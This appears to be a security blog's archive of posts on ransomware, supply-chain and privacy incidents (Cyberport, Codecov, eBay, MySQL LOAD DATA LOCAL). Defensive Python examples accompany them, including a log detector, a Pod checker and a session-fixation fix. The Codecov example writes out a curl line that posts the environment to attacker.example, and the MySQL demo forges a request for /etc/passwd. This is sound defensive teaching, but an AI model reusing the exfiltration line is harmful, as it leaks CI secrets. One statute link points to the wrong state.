Category Archives: Data privacy

Hong Kong Cyberport is plagued by ransomware! (15th Sep 2023)

Preface: On 13th Sep 2023 there was a further development in the Cyberport hacking incident, reported by wepro180[.]com. The 400GB of stolen data was published on the dark web on Tuesday (12/9), including employee salaries, applicant resumes, credit card information and other sensitive documents. Cyberport said it has directly contacted those who may be affected.

Think about it after you know it

About the computer functional footprint – Business users often keep data in SharePoint lists, and operations management needs reports and analytics on that data, so a popular ETL solution is usually chosen. The ETL process extracts data from the different sources, transforms it, and loads it into the data warehouse (MSSQL).

By default, CLR integration is disabled in SQL Server (the "clr enabled" configuration option is 0). Once it is enabled, stored procedures, triggers, user-defined functions, user-defined aggregates and user-defined types can be written in Microsoft .NET code, e.g. Visual Basic .NET or C#, and they run inside the database engine process.

For example: a table-valued function (TVF) written as a CLR function.

The rise of the ransomware power

In April 2023, security researchers observed Trigona targeting MSSQL servers whose credentials had been obtained by brute-force password guessing. The group itself has been active on the Internet since about late October 2022.

Trigona’s operators deploy a CLR shell (a .NET assembly loaded into the database engine) in their attacks against MS-SQL servers. Perhaps the reason for targeting SQL servers is precisely this design weakness: once CLR is enabled and an UNSAFE assembly is allowed, arbitrary code runs with the privileges of the SQL Server service account. All versions of Trigona seen so far use TDCP_rijndael (a Delphi AES implementation) to encrypt the target files.
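The two things a defender can see in the SQL Server ERRORLOG for an intrusion of this shape are the password-guessing burst that precedes it and the sp_configure changes (enabling CLR, relaxing "clr strict security", enabling xp_cmdshell) that precede loading an assembly. The detection below is an added example written for this page, not code from the Trigona research or from Microsoft; the log lines are constructed samples in ERRORLOG format, and the success line assumes login auditing is set to record successful logins (by default only failures are logged).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in SQL Server ERRORLOG format (not from any real server):
# a password-guessing burst against 'sa', a success, then the sp_configure
# changes an intruder needs before loading a CLR assembly.
SAMPLE_ERRORLOG = """\
2023-09-12 03:14:05.10 Logon       Error: 18456, Severity: 14, State: 8.
2023-09-12 03:14:05.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-12 03:14:05.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-12 03:14:05.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-12 03:14:05.73 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-12 03:14:05.94 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-12 03:14:06.15 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-12 03:14:07.02 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2023-09-12 03:15:40.00 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-09-12 03:15:41.00 spid55      Configuration option 'clr enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-09-12 03:15:42.00 spid55      Configuration option 'clr strict security' changed from 1 to 0. Run the RECONFIGURE statement to install.
2023-09-12 09:00:00.00 Logon       Login failed for user 'reportuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.8]
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(\S+)\s+(.*)$")
FAIL_RE = re.compile(r"Login failed for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
SUCCESS_RE = re.compile(r"Login succeeded for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
CONFIG_RE = re.compile(r"Configuration option '([^']+)' changed from (\d+) to (\d+)")

# sp_configure transitions that turn T-SQL access into code execution.
RISKY_TRANSITIONS = {
    "clr enabled": ("0", "1"),
    "clr strict security": ("1", "0"),
    "xp_cmdshell": ("0", "1"),
    "Ole Automation Procedures": ("0", "1"),
}


def parse_errorlog(text):
    """Yield (timestamp, source, message) tuples; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m.group(2), m.group(3)))
    return events


def find_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Clients with >= threshold failed logins inside any `window`, and whether a
    successful login from the same client followed the burst (likely a guessed password)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, _src, msg in events:
        m = FAIL_RE.search(msg)
        if m:
            failures[m.group(2)].append(ts)
            continue
        m = SUCCESS_RE.search(msg)
        if m:
            successes[m.group(2)].append(ts)
    hits = {}
    for client, times in failures.items():
        times.sort()
        burst_end = None
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= threshold:
                burst_end = times[j - 1]
                break
        if burst_end is None:
            continue
        success_after = any(t >= burst_end for t in successes.get(client, []))
        hits[client] = {"failures": len(times), "success_after": success_after}
    return hits


def find_risky_config_changes(events):
    """(timestamp, spid, option, old, new) for every dangerous sp_configure change."""
    found = []
    for ts, src, msg in events:
        m = CONFIG_RE.search(msg)
        if m and RISKY_TRANSITIONS.get(m.group(1)) == (m.group(2), m.group(3)):
            found.append((ts.isoformat(sep=" "), src, m.group(1), m.group(2), m.group(3)))
    return found


if __name__ == "__main__":
    evs = parse_errorlog(SAMPLE_ERRORLOG)
    print(find_bruteforce(evs))
    print(find_risky_config_changes(evs))
```

On the sample the burst from 203.0.113.5 is flagged with a success following it, the single failure from 10.0.0.8 is not, and the "clr enabled" and "clr strict security" changes are reported while "show advanced options" (harmless on its own) is ignored. On a real server the same two queries should be repeated against sys.configurations and sys.assemblies, since an attacker can also clear the log.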

My comment: Any software and hardware design is meant to help people improve operating efficiency. In theory we all know about protection, defense and mitigation. However, when dealing with today’s demanding business world and multi-solution environments, talk about cybersecurity should be accompanied by practical support. However, the market is highly competitive and the establishment of any new project brings the burden of network security. Sometimes it’s a trade-off on the part of the business owner or management team.

Kubernetes Hardening Guidance by NSA & CISA (3rd Aug 2021)

Preface: Docker helps to “create” containers, and Kubernetes allows you to “manage” them at runtime. What is Kubernetes security? It is usually described in four layers: Cloud, Cluster, Container and Code (the “4Cs”).

Background: NSA and CISA observe that Kubernetes is commonly targeted for three reasons: data theft, theft of computational power (cryptomining), or denial of service. Some container and cloud incidents of recent years show these motives in practice. Details are as follows:

Capital One – Occurring in 2019, this breach saw 30GB of credit application data affecting about 106 million people exfiltrated. A mis-configured firewall allowed an attacker to query the internal instance metadata service and obtain Amazon Web Services credentials.
Docker Hub – Attackers managed to plant malicious images on Docker Hub. Users who pulled them unknowingly deployed cryptocurrency miners in the form of Docker containers, which then diverted compute resources toward mining cryptocurrency for the attacker.
Microsoft Azure – Microsoft has seen a lot of cryptojacking woes of its own: in April 2020 it disclosed a large-scale cryptomining attack against Kubernetes clusters running in Azure.
Tesla – Automaker Tesla was one of the earlier victims of cryptojacking, when a Kubernetes cluster was compromised because an administrative console was not password protected (mis-configuration).
Jenkins – Hackers exploited a vulnerability in Jenkins to cryptomine to the tune of about $3.5 million, or 10,800 Monero, in 18 months. In the Docker ecosystem, six malicious images were found to have been pulled collectively over 2 million times, so up to 2 million container deployments were potentially mining Monero for the attacker.

To avoid similar incidents, the National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report, “Kubernetes Hardening Guidance”. Primary actions include scanning containers and Pods for vulnerabilities or mis-configurations, running containers and Pods with the least privileges possible, and using network separation, firewalls, strong authentication, and log auditing. Please refer to the link for details – https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2716980/nsa-cisa-release-kubernetes-hardening-guidance/
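The "least privileges possible" item translates into a handful of Pod spec fields. The checker below is an added example written for this page, not a tool from NSA, CISA or the Kubernetes project: it takes a manifest already loaded into a Python dict (via json or yaml) and reports every setting that would have let the Tesla- or Docker Hub-style incident above escalate. It generalizes slightly beyond a bare Pod by also accepting workloads (Deployment, DaemonSet, Job) whose spec.template wraps a Pod spec. Both manifests and the image names are constructed for the example.

```python
# Constructed manifests (dict form of the YAML), not taken from any real cluster.
WEAK_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "etl-worker"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "docker-sock",
                     "hostPath": {"path": "/var/run/docker.sock"}}],
        "containers": [{
            "name": "etl",
            "image": "registry.example/etl:latest",
            "securityContext": {"privileged": True},
            "volumeMounts": [{"name": "docker-sock", "mountPath": "/var/run/docker.sock"}],
        }],
    },
}

HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "etl-worker"},
    "spec": {
        "automountServiceAccountToken": False,
        "securityContext": {"runAsNonRoot": True, "runAsUser": 10001,
                            "seccompProfile": {"type": "RuntimeDefault"}},
        "volumes": [{"name": "scratch", "emptyDir": {}}],
        "containers": [{
            "name": "etl",
            "image": "registry.example/etl:1.4.2",
            "securityContext": {"allowPrivilegeEscalation": False,
                                "readOnlyRootFilesystem": True,
                                "capabilities": {"drop": ["ALL"]}},
            "volumeMounts": [{"name": "scratch", "mountPath": "/tmp"}],
        }],
    },
}


def pod_spec_of(manifest: dict):
    """Accept a bare Pod or a workload (Deployment, DaemonSet, Job...) whose
    spec.template wraps a Pod spec. Returns (name, pod_spec)."""
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    if manifest.get("kind") == "Pod":
        return name, manifest.get("spec", {})
    return name, manifest.get("spec", {}).get("template", {}).get("spec", {})


def check_pod(manifest: dict):
    """Return a list of least-privilege findings; an empty list means it passes."""
    name, spec = pod_spec_of(manifest)
    findings = []
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{name}: spec.{flag} is true (shares a host namespace)")
    if spec.get("automountServiceAccountToken", True):   # Kubernetes default is true
        findings.append(f"{name}: service account token is auto-mounted")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"{name}: volume {vol.get('name')} mounts hostPath {vol['hostPath'].get('path')}")
    pod_sc = spec.get("securityContext", {})
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        cname = f"{name}/{c.get('name')}"
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"{cname}: privileged container (full host access)")
        # a container-level setting overrides the pod-level one
        if not sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot", False)):
            findings.append(f"{cname}: runAsNonRoot not set (may run as uid 0)")
        if sc.get("allowPrivilegeEscalation", True):     # default is true
            findings.append(f"{cname}: allowPrivilegeEscalation not disabled")
        if not sc.get("readOnlyRootFilesystem", False):
            findings.append(f"{cname}: root filesystem is writable")
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            findings.append(f"{cname}: Linux capabilities not dropped (add drop: [ALL])")
        image = c.get("image", "")
        last = image.rsplit("/", 1)[-1]
        if ":" not in last or image.endswith(":latest"):
            findings.append(f"{cname}: image {image!r} is untagged or :latest (not reproducible)")
    return findings


if __name__ == "__main__":
    for f in check_pod(WEAK_POD):
        print("WEAK   ", f)
    print("HARDENED", check_pod(HARDENED_POD) or "no findings")
```

The weak manifest produces nine findings (host PID namespace, mounted Docker socket, privileged, root user, writable root filesystem, full capability set, escalation allowed, auto-mounted service account token, floating tag); the hardened one produces none. The same checks can be enforced cluster-wide with Pod Security Admission or an admission controller, but running them in CI catches the mistake before the manifest reaches the cluster.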

Aforementioned – Insurance company infected by ransomware – 25th May 2021

News feed: AXA Group announced on Sunday (16-05-2021) that the company had become a victim of a ransomware attack. AXA Hong Kong said there was no evidence that data processed by Inter Partners Asia in markets other than Thailand had been affected by the targeted ransomware attack. There has been no official announcement since then updating this incident.

Technology exploration: Avaddon ransomware encrypts files in offline mode using AES-256 + RSA-2048 (the usual hybrid scheme: each file is encrypted with a random AES key, and that key is encrypted with the attacker’s RSA public key, so no contact with the attacker is needed during encryption). Even for a 128-bit AES key, checking each of the 2^128 possible key values (a “brute force” attack) is so computationally intensive that even the fastest supercomputer would require, on average, more than 100 trillion years to do it. The Microsoft .NET cryptography library is capable of encrypting and decrypting files on its own, and the Windows 10 operating system ships with the .NET Framework 4 installed and enabled by default. Therefore the cybercriminal can simply reuse this built-in service. For more details, please refer to the attached document.

What is the consequence if AXA underestimates this matter? Or is it just a bluff?

In a similar type of attack (files encrypted with RSA-2048 and AES-128 keys), the cyber-criminals first gain access through remote control systems; after the machine is infected with the ransomware, data exfiltration follows. In fact, the hacker group claimed to have stolen 3 terabytes of data, including a long list of information: ID cards, passport copies, customer claims, reserved agreements, denied reimbursements, payments to customers, contracts and reports, customer IDs and scanned bank account papers, hospital and doctor reserved material (private investigation for fraud) and customer medical reports including HIV, hepatitis, STD and other illness reports.

Latest news: https://www.thestandard.com.hk/section-news/section/2/230327/Axa-HK-unaffected-by-cyberattack

CISA urges the public to be aware of the Codecov software vulnerability – 30th Apr, 2021

Preface: CISA is aware of a compromise of the Codecov software supply chain in which a malicious threat actor made unauthorized alterations of Codecov’s Bash Uploader script, beginning on January 31, 2021.

Background: A supply chain attack gone undetected for two months. Codecov has over 29,000 enterprise customers, including well-known names like Atlassian, the Washington Post, GoDaddy, Royal Bank of Canada, and Procter & Gamble.

Vulnerability details: Through the vendor’s investigation, there is now additional information concerning what environment variables may have been obtained without authorization and how they may have been used. The issue occurred due to an error in Codecov’s Docker image creation process that enabled the actors to extract the credential needed to modify the Bash Uploader script. The modified script then exfiltrated sensitive information from customers’ CI environments: the environment variables (tokens, keys and credentials) present when the uploader ran. For more details, please refer to link – https://about.codecov.io/security-update/
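The lesson for anyone who pipes a downloaded script into bash in CI is that the script must be pinned to a hash recorded out of band, and that a one-line change posting the environment to a foreign host should be visible in a diff or a scan. The code below is an added example for this page, not Codecov’s uploader or any code from the incident: the two scripts are constructed stand-ins (the "tampered" one adds a line of the same shape as the reported modification, with made-up hosts coverage.example and attacker.example), and the expected hash is whatever you computed from the copy you reviewed.

```python
import hashlib
import hmac
import re

# Constructed stand-in for a CI coverage uploader script; this is NOT the real
# Codecov Bash Uploader, and coverage.example / attacker.example are made-up hosts.
TRUSTED_SCRIPT = """#!/usr/bin/env bash
set -e
echo "uploading coverage report"
curl -s -X POST --data-binary @coverage.xml "https://coverage.example/upload?token=$CODECOV_TOKEN"
"""

# Same script with one extra line of the kind the incident involved: the whole
# process environment (where CI secrets live) is posted to an unrelated host.
TAMPERED_SCRIPT = TRUSTED_SCRIPT + (
    'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://attacker.example/upload\n'
)

NET_CLIENT_RE = re.compile(r"\b(curl|wget)\b")
ENV_DUMP_RE = re.compile(r"\$\(\s*(env|printenv|set)\b|\b(env|printenv)\s*\|")
URL_HOST_RE = re.compile(r"https?://([^/\s\"']+)")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def verify_uploader(script_text: str, expected_sha256: str) -> bool:
    """Pin the script: refuse to run it unless it hashes to the value recorded
    out of band (or published by the vendor). Constant-time compare as a habit."""
    return hmac.compare_digest(sha256_hex(script_text), expected_sha256.lower())


def suspicious_lines(script_text: str, allowed_hosts):
    """Second line of defence when no pin exists: flag any line that uses a network
    client and either dumps the environment or talks to a host outside the allowlist."""
    findings = []
    for n, line in enumerate(script_text.splitlines(), 1):
        if not NET_CLIENT_RE.search(line):
            continue
        reasons = []
        if ENV_DUMP_RE.search(line):
            reasons.append("posts environment variables")
        for host in URL_HOST_RE.findall(line):
            if host.split(":")[0].lower() not in allowed_hosts:
                reasons.append(f"contacts unexpected host {host}")
        if reasons:
            findings.append((n, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    pinned = sha256_hex(TRUSTED_SCRIPT)          # what you would store in the pipeline config
    print("trusted ok:", verify_uploader(TRUSTED_SCRIPT, pinned))
    print("tampered ok:", verify_uploader(TAMPERED_SCRIPT, pinned))
    print(suspicious_lines(TAMPERED_SCRIPT, {"coverage.example"}))
```

With the hash pinned, the tampered copy is rejected before it runs; without a pin, the scanner still points at line 5 for both reasons (environment dump and unknown host). Neither check replaces the real fix from the incident, which is not to fetch and execute a mutable script at build time at all, but they are cheap to add to any pipeline that still does.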

eBayer, are you aware someone is behind you? 25th May 2020

Preface: A host discovery function is a normal part of a detection and vulnerability scan service. Under normal circumstances, since such a scanner runs on your own private network, there is no objection to this setting.

Synopsis: When visiting eBay, a script runs that performs a local port scan of your computer to detect remote support and remote access applications, said Bleeping Computer.

Verification: Refer to the “Bleeping Computer” information (https://www.bleepingcomputer.com/news/security/ebay-port-scans-visitors-computers-for-remote-access-programs/). There is already a script on the eBay front-end web portal that has a scanning function; please refer to the following URL (https://src.ebay-us.com/fp/check.js?org_id=usllpic0&session_id=1). Apart from that, this matter lured my interest to know the details. Following my analysis steps, I also found that the current user profile has a design weakness (SQL injection). Perhaps this issue is only detected when the user is logged in. Now return the focus to the scan function. From a technical point of view, there is no 100% guarantee that the existing protection mechanism can avoid session fixation. So eBay should be aware of it. For the details of session fixation, please refer below:

Wiki: Session fixation is an attack that permits an attacker to hijack a valid user session. The attack exploits a limitation in the way the web application manages the session ID: the vulnerable application accepts a session ID that existed before authentication (for example one the attacker obtained and planted in the victim’s browser) and keeps using that same ID after the user logs in, so the attacker’s copy of the ID becomes an authenticated session.
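The defence is mechanical: issue a fresh session ID at the moment of authentication and retire the old one, and never adopt an ID the server did not itself issue. The snippet below is an added example for this page, not code from eBay or from any framework; it is a minimal in-memory session table with a switch between the vulnerable behaviour and the fix, and a demo that plays the attacker’s and victim’s steps against each.

```python
import secrets


class SessionStore:
    """Minimal server-side session table. `regenerate_on_login` selects the
    vulnerable behaviour (False: keep the pre-login ID) or the fix (True)."""

    def __init__(self, regenerate_on_login: bool):
        self.regenerate_on_login = regenerate_on_login
        self._sessions = {}  # session id -> {"user": str | None}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)      # 256 bits from the OS CSPRNG, unguessable
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, user: str) -> str:
        """Authenticate the holder of `sid`; returns the ID the browser must use from now on."""
        if sid not in self._sessions:
            # An ID the server never issued (e.g. one supplied in a URL) is never adopted.
            sid = self.new_session()
        if not self.regenerate_on_login:
            self._sessions[sid]["user"] = user   # vulnerable: attacker-known ID stays valid
            return sid
        del self._sessions[sid]                  # fixed: retire the pre-auth ID ...
        fresh = self.new_session()               # ... and bind the user to a brand-new one
        self._sessions[fresh]["user"] = user
        return fresh

    def user_for(self, sid: str):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None


def session_fixation_demo(regenerate_on_login: bool):
    """Attacker obtains a valid unauthenticated ID, plants it in the victim's browser,
    the victim logs in with it. Returns what the attacker's copy of the ID now resolves to."""
    store = SessionStore(regenerate_on_login)
    planted = store.new_session()              # step 1: attacker gets an ID from the site
    store.login(planted, "victim")             # step 2/3: victim authenticates with that ID
    return store.user_for(planted)             # step 4: attacker replays the ID


if __name__ == "__main__":
    print("vulnerable store, attacker's ID resolves to:", session_fixation_demo(False))
    print("fixed store, attacker's ID resolves to:", session_fixation_demo(True))
```

With the vulnerable store the planted ID resolves to "victim" after login; with regeneration it resolves to nothing. In a real application the new ID also needs Secure, HttpOnly and SameSite cookie attributes and must be invalidated on logout, but those do not change the core rule shown here.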

Comment: I have been an eBayer since 2000. However, I could not find an official announcement that eBay is going to scan my device. Perhaps I am not the only one with this unsatisfied feeling.

Discarded Tesla car parts contain information. Maybe you can buy it on eBay. Who can you trust in the technological world? Even if no such incident occurs, a supplier can read your local data without your consent (8th May 2020)

Preface: The traditional methods of disposing of hard drives are degaussing or incineration.

Headline News: The manufacturer has a hardware disposal policy; the incidents encountered by Tesla may be due to improper handling by third parties. For more information about the headline news, please refer to this link. https://www.hackread.com/user-data-found-in-tesla-car-parts-ebay/

Supplement: Do you have doubts about the privacy of your personal data in IoT devices? You might be interested in reading the following.

Who can you trust in the Internet world? Security issues with LOAD DATA LOCAL in MySQL DB.

Technical overview:
Security issues with LOAD DATA LOCAL on the MySQL DB server side:
In the protocol, it is the server, not the client, that names the file the client should upload, so a malicious or patched server could ask for any file on the client host to which the client user has read access, regardless of what statement the client actually sent. Please refer to this link to read the details – http://www.antihackingonline.com/application-development/who-can-you-trust-in-the-internet-world-security-issues-with-load-data-local-in-mysql-db/

Official announcement – Security Considerations for LOAD DATA LOCAL. Please refer to this URL: https://dev.mysql.com/doc/refman/8.0/en/load-data-local-security.html
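The rogue-server problem is easiest to see at the packet level: after any query, a server may answer with a packet whose first payload byte is 0xFB followed by a file name, and a naive client with local_infile enabled simply opens that file and sends it. The code below is an added example for this page, not MySQL’s client library; it frames packets the way the MySQL wire protocol does and implements the client-side policy a careful driver should have: honour the request only when local_infile is on and the client itself just issued LOAD DATA LOCAL INFILE naming that exact file. The file names and the rogue reply are constructed for the demo.

```python
import re
import struct

LOCAL_INFILE_MARKER = 0xFB   # first payload byte of the server's "send me this file" request
LOAD_LOCAL_RE = re.compile(
    r"^\s*LOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+'([^']+)'", re.I)


def build_packet(payload: bytes, seq: int) -> bytes:
    """MySQL wire framing: 3-byte little-endian payload length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def parse_packet(buf: bytes):
    length = int.from_bytes(buf[:3], "little")
    return buf[3], buf[4:4 + length]


class LocalInfileGuard:
    """Client-side policy: only hand over a file if (a) local_infile is enabled and
    (b) this client itself just issued LOAD DATA LOCAL INFILE naming that exact file."""

    def __init__(self, local_infile_enabled: bool):
        self.enabled = local_infile_enabled
        self.expected_file = None

    def on_query(self, sql: str):
        m = LOAD_LOCAL_RE.match(sql)
        self.expected_file = m.group(1) if (m and self.enabled) else None

    def on_server_packet(self, payload: bytes):
        if not payload or payload[0] != LOCAL_INFILE_MARKER:
            return ("other", None)           # OK/ERR/result set: not our concern here
        requested = payload[1:].decode("utf-8", "replace")
        if not self.enabled or requested != self.expected_file:
            return ("refused", requested)    # server named a file we never offered
        self.expected_file = None            # one file per statement, then forget it
        return ("send", requested)


def exchange(guard: LocalInfileGuard, sql: str, server_reply: bytes):
    """One round trip: client sends `sql`, server answers with a raw packet."""
    guard.on_query(sql)
    _seq, payload = parse_packet(server_reply)
    return guard.on_server_packet(payload)


if __name__ == "__main__":
    g = LocalInfileGuard(local_infile_enabled=True)
    rogue = build_packet(b"\xfb/etc/passwd", 1)          # server asks for a file after SELECT 1
    print(exchange(g, "SELECT 1", rogue))
    legit = build_packet(b"\xfb/tmp/data.csv", 1)
    print(exchange(g, "LOAD DATA LOCAL INFILE '/tmp/data.csv' INTO TABLE t", legit))
```

A plain SELECT answered with a file request is refused, the file named in the client’s own LOAD DATA LOCAL statement is sent once, and a client configured with local_infile off refuses everything. The practical takeaways match the MySQL documentation linked above: keep local_infile disabled on clients that do not need it, and do not connect with LOCAL enabled to servers you do not control.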

Do you worry that the camera on your iPhone can be manipulated by a hacker? 6th Apr 2020

Preface: Apple paid $75,000 to the hacker who reported the camera hijacking bugs. As they say, bugs are never ending. Perhaps the next round will be yours.

Background: If you let a friend access your phone for 5–7 minutes, they could have installed spyware on it, perhaps only as a joke. As a matter of fact, a hacker can implant malicious code into a web page to achieve a similar result. Most recently, Apple paid $75,000 to the hacker who reported the camera hijacking bugs.

Observation: Referring to the attached picture, a simple HTML file can easily trigger the iPhone camera function. Because Apple’s control is very good, the access triggers a permission prompt and lets you know. In the reported case, a hacker could hijack your iPhone camera through a software application or a website. However, the iPhone owner can see which applications have access to the camera, so it is recommended to check the phone’s privacy settings regularly.

Chrome and Safari on iOS can access your camera without special markup and can perform both AJAX POST and synchronous form POST operations just like a desktop browser, so a page that captures an image can also upload it. So please be careful when browsing the web on your phone.

Marriott says 5.2 million guest records were stolen in another data breach. 31st Mar 2020

Preface: Perhaps this is not the key factor that caused the data breach in Jan 2020, but it is a telling sign.

Observation: The new round of data breaches at Marriott this week has attracted attention. Hotels run 24 hours a day, so maintenance or system upgrades are not easy. Looking only at the homepage of Marriott’s “Member Credit Card Rewards” site, we found a vulnerable jQuery version still in operation. From an attacker’s point of view, such a hint suggests that this web site may have more room for exploitation. As we know, jQuery 1.11.3 has an XSS vulnerability found in March 2017. Why is it still in use on an enterprise web site? The root cause is hard to tell; maybe it is an extended legacy web application. If you are concerned about the details of the official announcement, see the URL below:

https://mysupport.marriott.com/

Outline the definition of data breach law in five major U.S. population areas – Mar 2020

Preface: A ransomware attack against a person or organization may be considered a data breach under federal or state law. While attempting to unlock and recover its data, a victim of a ransomware attack may also have an obligation to enact its data breach protocol and notify the individuals whose data is affected by the attack.

Perhaps cybersecurity experts will focus on design weaknesses, including the circumstances under which data breaches can occur. We all know that the GDPR brings the subject of data privacy to court, with fines based on the actual situation. But the GDPR applies in European countries. What about the United States of America?

About who must obey the law:

New York (N.Y. Gen. Bus. Law § 899-AA, N.Y. State Tech. Law 208)- https://www.nmlegis.gov/Sessions/17%20Regular/final/HB0015.pdf

California (Cal. Civ. Code §§ 1798.29, 1798.82) – http://leginfo.legislature.ca.gov/faces/codes_displaySection.xhtml?lawCode=CIV&sectionNum=1798.82

Illinois (815 ILCS §§ 530/1 to 530/25) – http://www.ilga.gov/legislation/ilcs/ilcs3.asp?ActID=2702&ChapAct=815%C2%A0ILCS%C2%A0530/&ChapterID=67&ChapterName=BUSINESS+TRANSACTIONS&ActName=Personal+Information+Protection+Act

Texas (Tex. Bus. & Com. Code §§ 521.002, 521.053) – https://statutes.capitol.texas.gov/Docs/BC/htm/BC.521.htm#521.002

Arizona (Ariz. Rev. Stat. § 18-545) – https://www.azleg.gov/viewDocument/?docName=http://www.azleg.gov/ars/18/00545.htm

Pennsylvania (73 Pa. Stat. §§ 2301 et seq) – https://govt.westlaw.com/pac/Browse/Home/Pennsylvania/UnofficialPurdonsPennsylvaniaStatutes?guid=N9B3F41908C4F11DA86FC8D90DD1949D4&originationContext=documenttoc&transitionType=Default&contextData=(sc.Default)

Please be vigilant: spyware can be installed on your phone at any time – Oct 2019

Preface: Since spyware runs in stealth mode, it lets someone track the device without being detected.

Background: The Patriot Act empowers law enforcement agencies and related departments to legally monitor the movements of suspects, especially in terrorism cases, and so law enforcement agencies use spyware to monitor a target’s movements. As time went by, quite a lot of software vendors transformed mobile phone monitoring tools (spyware) into consumer products. FlexiSpy and Spyzie are popular in the market, and you can purchase these products through the vendors’ web portals. The vendors’ slogan is that no rooting or jailbreaking is required, and that it is easy to track SMS, call logs, social apps and locations.

Legal point of view: If the spyware was ‘used on a case’, a detailed report should be provided. Given the functionality of FlexiSpy, it would require a wiretap order, not just a search and seizure warrant, said an attorney.

The reasons why cyber criminals want to hack your phone:

  • To eavesdrop on calls
  • To steal money
  • To blackmail people

So the Federal Trade Commission recommends that smartphone users who suspect an illegitimate stalking app on their device consider its recommendations. Refer to the URL for more details. https://www.consumer.ftc.gov/blog/2019/10/stalking-apps-retina-x-settles-charges